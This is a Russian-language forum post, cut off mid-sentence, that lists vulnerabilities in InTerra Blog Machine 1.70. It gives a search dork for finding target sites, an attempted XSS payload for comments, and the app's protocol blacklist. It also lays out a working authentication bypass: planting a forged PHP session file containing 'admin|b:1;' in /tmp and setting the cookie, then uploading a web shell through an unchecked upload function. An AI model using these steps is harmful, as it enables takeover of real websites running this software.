Уязвимости InTerra Blog MachineName : InTerra Blog Machine Site : Dull.ru Version : 1.70 Dork : "Powered by InTerra Blog Machine" Существует хсс, но "раскрутить" до конца не получается, так как жестко фильтруется: lib\safehtml\classes\safehtml.php PHP: // dangerous protocols var $BlackProtocols = array("javascript", "vbscript", "about", "wysiwyg", "data", "view-source", "ms-its", "mhtml", "shell", "lynxexec", "lynxcgi", "hcp", "ms-help", "help", "disk", "vnd.ms.radio", "opera", "res", "resource", "chrome", "mocha", "livescript", ); Вообщем вот до чего дошол: (Добавление комент.) Code: <a href=`http://xek.comd" onclick='overflow'><i>wtf?<a style='font-size:30px; color:red;'>hekked</a></i> А всё потому, что в actions\addcomment.php PHP: //prepare contents $comment = strip_tags($_POST['comment'],"<a>,<i>,<b>"); Разрешины три тэги, но клас safehtml всё отрубает. Просьба кто будет смотреть присмотреться к етой хсс, возможна ли она там вообще. Авторизация. Подмена сесии. Всё гениально: PHP: //check access if(!$_SESSION['admin']){ header("Location: " . SERVER_ROOT); exit; } Собственно идем в /tmp создаем сесию, права 0777: sess_aaec41a3b692b6be0dc292e40b778595 Code: admin|b:1; Ну и вбиваем куку в браузере. После авторизации И заливаем шелл. Проверки нет lib\uploader.class.php PHP: function copyFile($name,$destination){ if(!$result = move_uploaded_file($name,$destination)){ $result = copy($name,$destination); } return $result; } Грузится в
